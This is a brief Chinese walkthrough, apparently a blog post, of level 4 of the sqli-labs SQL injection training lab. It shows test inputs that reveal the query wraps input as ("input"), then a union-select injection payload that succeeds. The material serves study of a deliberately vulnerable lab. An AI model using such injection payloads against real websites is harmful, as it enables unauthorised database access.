本文主要是介绍sqllab第四关通关笔记,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
知识点:
- 判断注入点类型
- 判断原始语句
- select 1,2,3 from 表名 where id=("输入") limit 0,1;
首先判断注入类型
构造id=1/0
正常打印;字符型注入
构造id=1'
正常回显;说明不是用单引号读取输入内容
构造id=1"
发生异常;回显出现了关键信息‘)’
说明原始语句中对输入的读取格式为 ("输入")
默认单引号为字符串信息
好了,既然知道了语法信息,下面就开始注入
构造payload:id=0")+union+select%201,2,3%20--+
这和第三关类似;联合注入;成功打印输入的内容
10
这篇关于sqllab第四关通关笔记的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
